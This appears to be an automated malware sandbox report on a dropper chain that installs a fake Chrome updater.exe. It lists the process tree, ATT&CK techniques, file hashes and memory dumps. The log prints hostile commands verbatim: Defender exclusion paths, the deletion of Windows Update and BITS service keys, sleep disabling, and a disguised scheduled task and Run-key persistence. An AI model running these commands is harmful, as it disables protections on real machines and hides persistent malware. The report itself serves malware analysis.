"C:\Users\Admin\AppData\Local\Temp\setup.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3592

C:\Windows\SYSTEM32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
4⤵
- Suspicious use of WriteProcessMemory
PID:708

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:4904

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:4344

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:664

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:1316

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:2464

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
5⤵
PID:2512

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
5⤵
PID:2832

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
5⤵
- Modifies security service
PID:3844

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
5⤵
PID:3952

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
5⤵
PID:4632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#tnsgzmlqv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1296

C:\Windows\SYSTEM32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of WriteProcessMemory
PID:404

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2200

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4684

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2132

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#lkntrxaxo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4296

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
5⤵
PID:4424

C:\Users\Admin\AppData\Local\Temp\setup23.exe
"C:\Users\Admin\AppData\Local\Temp\setup23.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2112

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
4⤵
- Creates scheduled task(s)
PID:4364

C:\Users\Admin\AppData\Local\Temp\setup2321.exe
"C:\Users\Admin\AppData\Local\Temp\setup2321.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3212

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:5040

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
- Loads dropped DLL
PID:3488

C:\Users\Admin\AppData\Local\Temp\watchdog.exe
"C:\Users\Admin\AppData\Local\Temp\watchdog.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2244

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:97044

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:4036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1296

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:5456

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:5692

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:5756

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:5784

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:5808

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:5824

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:5844

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:5864

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:5892

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:5988

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:6308

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:5468

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:5564

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:5652

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:5728

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:5768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#tnsgzmlqv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5496

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe dusipgdp
2⤵
PID:6944

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
3⤵
- Drops file in Program Files directory
PID:6984

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
4⤵
- Modifies data under HKEY_USERS
PID:7048

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:6956

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe yvlyxjfdxdcidxwf GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1pmYVvkjJN4HofKGCqATpWU9EnXlzYLkPxSmgsIYJU04
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:7084

C:\Users\Admin\AppData\Local\cache\MoUSO.exe
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:7156

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Scripting

T1064

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
7.1MB

MD5
3c307d96de8b5ae76bd3b331aa4a81d5

SHA1
35d314121f180ea37dfdebc28c463f2d21bf1be3

SHA256
77e8ce0b2cdea0703a8c29af3656baeacf141add0fe7bba671040c1c552fbda7

SHA512
0a7bf0fcc847564177bf888b5e271c109b64dcf860f85af3d58e1d9f4431ec58927bf14aef09d51c17b441b65215d4d269e863b7610f73278daca2114089ce14

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
7.1MB

MD5
3c307d96de8b5ae76bd3b331aa4a81d5

SHA1
35d314121f180ea37dfdebc28c463f2d21bf1be3

SHA256
77e8ce0b2cdea0703a8c29af3656baeacf141add0fe7bba671040c1c552fbda7

SHA512
0a7bf0fcc847564177bf888b5e271c109b64dcf860f85af3d58e1d9f4431ec58927bf14aef09d51c17b441b65215d4d269e863b7610f73278daca2114089ce14

Download Submit
C:\Program Files\Google\Libs\g.log
Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
Filesize
1KB

MD5
1ab40559264240268ccf628e75737482

SHA1
95f4c6822dcb3de6017309f4f77e8038c0c7f83a

SHA256
e3da7cb3e1dbb5577e4679e066e1e9235b18ea23d8e3f5f84f96fb58eccd9024

SHA512
645f715ef2d86813977bf32eba89d3b5b400a377752f829304fb2c4270e5c75ca4d08fa4ab9d56cbbf3f9b9579c715ab19fecacc58e9bb2a09f6ff6d7f5ef8b5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
Filesize
438B

MD5
3c937e45d186df6d5b2a0960bf789a29

SHA1
ee3380facbbf975115b7548f35f6c843d0c38616

SHA256
e5753bb39ea83f93026a6e45410e226a08c4a44a5b7ced725bd96cd66f349140

SHA512
97c1188990950a46b46f97b87b42b53a3ffb3c902a00281affbf3416f29b8c75e5b0192efc95782555543b0e5c99940208167972fd3af58ce20a0eac1e339977

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
762e1d1a0661d2554b9f4d83a7c141c9

SHA1
10b41a0841595a415dfa59d5536afeaf6b0acbe0

SHA256
d7d2432d01534758359cf7d862d1c0b6bbcb8aebaaa577260c9aef987a0e8a46

SHA512
3d26f549fc76a9cccbb54330252f01931aa424e812fbc0d78acd01e58cb8f67bdccd97a882ab1c9114fc276be780d74457aaa4f021fbd4337741ae0bfed52dc3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
2338033db69dc1568d8116cd7cdb6c31

SHA1
6a71e496a265d5704f8fe5c4d5073902b39e1ea7

SHA256
8d345a9e4f7414705bdc7ac6e91e1938fcfd12bee47e46c4fb75ed5f1cbaa92b

SHA512
907241ca6e3de7e8590bb5a2b245db3920b903a51c478c7fac6e642d5bacc253b684e67fc8623f2ee170017485001eed980a6665044768798748f9d68cbe2114

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe
Filesize
7.1MB

MD5
8420df05dccb9604b2322809929b938b

SHA1
d905b00e2f5c0cbbfe683ee3683b1756c95ea929

SHA256
99aac284662b947222d4083dff6dfeb8a002770b6249f189fafb4613f6c08515

SHA512
b5a92b5d56cabc5eae4b1d2be9b25e5c54fc1be6ada6731eb4905251c7ca82fa00d2f054437142279469cef140e032544d9c4137bac36466a6fddd50834e7f57

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe
Filesize
7.1MB

MD5
8420df05dccb9604b2322809929b938b

SHA1
d905b00e2f5c0cbbfe683ee3683b1756c95ea929

SHA256
99aac284662b947222d4083dff6dfeb8a002770b6249f189fafb4613f6c08515

SHA512
b5a92b5d56cabc5eae4b1d2be9b25e5c54fc1be6ada6731eb4905251c7ca82fa00d2f054437142279469cef140e032544d9c4137bac36466a6fddd50834e7f57

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup23.exe
Filesize
1.3MB

MD5
6a6c665fb4ffabed90a0a609b01cc420

SHA1
dafa13a40c13eebfda79feb12910553dfc72f3ed

SHA256
b0932b7493256f3740ab6f2ebf341fdc7e1d378f98851363bf1ff81cb300aacd

SHA512
00741a0bd67919a12bfa2ad41f211fa28e01c6177a30860faf1a847d7f8fa87df13ce16b33468f2f11ba735d707ad1b003e5b7aff9d483f6d197a950975e8de3

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup23.exe
Filesize
1.3MB

MD5
6a6c665fb4ffabed90a0a609b01cc420

SHA1
dafa13a40c13eebfda79feb12910553dfc72f3ed

SHA256
b0932b7493256f3740ab6f2ebf341fdc7e1d378f98851363bf1ff81cb300aacd

SHA512
00741a0bd67919a12bfa2ad41f211fa28e01c6177a30860faf1a847d7f8fa87df13ce16b33468f2f11ba735d707ad1b003e5b7aff9d483f6d197a950975e8de3

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup2321.exe
Filesize
3.5MB

MD5
a8fc140abfaae90c0615572b3215353c

SHA1
cc4397304e6f5c4b82bb52aa0cf54089e9338389

SHA256
f003f2e74dffa9bd0e3e181cf38b57f6a0618955f39e2174f18f236b15fc20df

SHA512
3329b6753746d02e10b133cf120d80243974a5e6d894a76a812e09b5b015eee940d2b2a1823acbb91e29c1860038c01132885db048156da5b91429604dd6dfde

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup2321.exe
Filesize
3.5MB

MD5
a8fc140abfaae90c0615572b3215353c

SHA1
cc4397304e6f5c4b82bb52aa0cf54089e9338389

SHA256
f003f2e74dffa9bd0e3e181cf38b57f6a0618955f39e2174f18f236b15fc20df

SHA512
3329b6753746d02e10b133cf120d80243974a5e6d894a76a812e09b5b015eee940d2b2a1823acbb91e29c1860038c01132885db048156da5b91429604dd6dfde

Download Submit
C:\Users\Admin\AppData\Local\Temp\watchdog.exe
Filesize
2.3MB

MD5
16cc5385354fe53a8a4f10a3c1d6e504

SHA1
0188aa75f084706eff23acac354c8a5d540a8795

SHA256
51aefda1af82fde0809a71728833d653e7d240a17f00ebc3bdd8d87079758c3f

SHA512
bfd279f192a59b23d76ce0d66cf090ad4f7020c2028ffe538607716bca17c36289e99250a0e1dc848b7d6eb28e58c42bd3302d954bb1c2f54f71fb4d0a1475f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\watchdog.exe
Filesize
2.3MB

MD5
16cc5385354fe53a8a4f10a3c1d6e504

SHA1
0188aa75f084706eff23acac354c8a5d540a8795

SHA256
51aefda1af82fde0809a71728833d653e7d240a17f00ebc3bdd8d87079758c3f

SHA512
bfd279f192a59b23d76ce0d66cf090ad4f7020c2028ffe538607716bca17c36289e99250a0e1dc848b7d6eb28e58c42bd3302d954bb1c2f54f71fb4d0a1475f7

Download Submit
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
Filesize
1.3MB

MD5
6a6c665fb4ffabed90a0a609b01cc420

SHA1
dafa13a40c13eebfda79feb12910553dfc72f3ed

SHA256
b0932b7493256f3740ab6f2ebf341fdc7e1d378f98851363bf1ff81cb300aacd

SHA512
00741a0bd67919a12bfa2ad41f211fa28e01c6177a30860faf1a847d7f8fa87df13ce16b33468f2f11ba735d707ad1b003e5b7aff9d483f6d197a950975e8de3

Download Submit
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
Filesize
1.3MB

MD5
6a6c665fb4ffabed90a0a609b01cc420

SHA1
dafa13a40c13eebfda79feb12910553dfc72f3ed

SHA256
b0932b7493256f3740ab6f2ebf341fdc7e1d378f98851363bf1ff81cb300aacd

SHA512
00741a0bd67919a12bfa2ad41f211fa28e01c6177a30860faf1a847d7f8fa87df13ce16b33468f2f11ba735d707ad1b003e5b7aff9d483f6d197a950975e8de3

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
573d77d4e77a445f5db769812a0be865

SHA1
7473d15ef2d3c6894edefd472f411c8e3209a99c

SHA256
5ec3f268845a50e309ae0d80bcee4f4dd4cd1b279ab1e64b523a057c11074f1c

SHA512
af2422a9790a91cdcbe39e6ef6d17899c2cbd4159b1b71ac56f633015068d3afc678fcef34892575bf59bdf7d5914ec6070864940d44130263fe84e28abba2dc

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
631f4b3792b263fdda6b265e93be4747

SHA1
1d6916097d419198bfdf78530d59d0d9f3e12d45

SHA256
4e68d2d067c5680a2e55853ac58b16f199b09f1b9e5f2174605fff18da828976

SHA512
e0280041c4ca63971ab2524f25d2047820f031c1b4aeb6021a3367297045ddf6616ffccafb54630eb07fd154571d844329ebcc34d6ce64834cb77cba373e4fbe

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
2KB

MD5
31a885e042675d331ac79ea263a44588

SHA1
4d65a162562724f44505995b307866526bb92f7d

SHA256
7c7aba5398f1767b85437079bf160de0e131da945dc7d61b9e092b653ae2be82

SHA512
357c6667f026141bf794d38348b34aaebbce2b2eddba10085bbaee9876f2cbf1a6bdc33f76b37d7fe9426c58e8c02303616f73b650aae55a8d3bf2789ad07d0d

Download Submit
\Users\Admin\AppData\LocalLow\mozglue.dll
Filesize
612KB

MD5
f07d9977430e762b563eaadc2b94bbfa

SHA1
da0a05b2b8d269fb73558dfcf0ed5c167f6d3877

SHA256
4191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862

SHA512
6afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf

Download Submit
\Users\Admin\AppData\LocalLow\nss3.dll
Filesize
1.9MB

MD5
f67d08e8c02574cbc2f1122c53bfb976

SHA1
6522992957e7e4d074947cad63189f308a80fcf2

SHA256
c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e

SHA512
2e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5

Download Submit
\Users\Admin\AppData\LocalLow\sqlite3.dll
Filesize
1.0MB

MD5
dbf4f8dcefb8056dc6bae4b67ff810ce

SHA1
bbac1dd8a07c6069415c04b62747d794736d0689

SHA256
47b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68

SHA512
b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1

Download Submit
memory/404-332-0x0000000000000000-mapping.dmp

Download
memory/664-344-0x0000000000000000-mapping.dmp

Download
memory/708-331-0x0000000000000000-mapping.dmp

Download
memory/1296-333-0x0000000000000000-mapping.dmp

Download
memory/1296-825-0x000001E7A4090000-0x000001E7A40AC000-memory.dmp

Filesize
112KB

Download
memory/1296-831-0x000001E7A45A0000-0x000001E7A4659000-memory.dmp

Filesize
740KB

Download
memory/1296-866-0x000001E7A4080000-0x000001E7A408A000-memory.dmp

Filesize
40KB

Download
memory/1296-810-0x0000000000000000-mapping.dmp

Download
memory/1316-348-0x0000000000000000-mapping.dmp

Download
memory/2112-236-0x0000000000200000-0x000000000055F000-memory.dmp

Filesize
3.4MB

Download
memory/2112-194-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-155-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-156-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-157-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-158-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-159-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-138-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-161-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-162-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-163-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-164-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-165-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-139-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-167-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-168-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-169-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-170-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-171-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-172-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-173-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-174-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-175-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-176-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-177-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-178-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-179-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-180-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-181-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-182-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-183-0x0000000000200000-0x000000000055F000-memory.dmp

Filesize
3.4MB

Download
memory/2112-184-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-185-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-186-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-187-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-188-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-189-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-190-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-191-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/2112-192-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
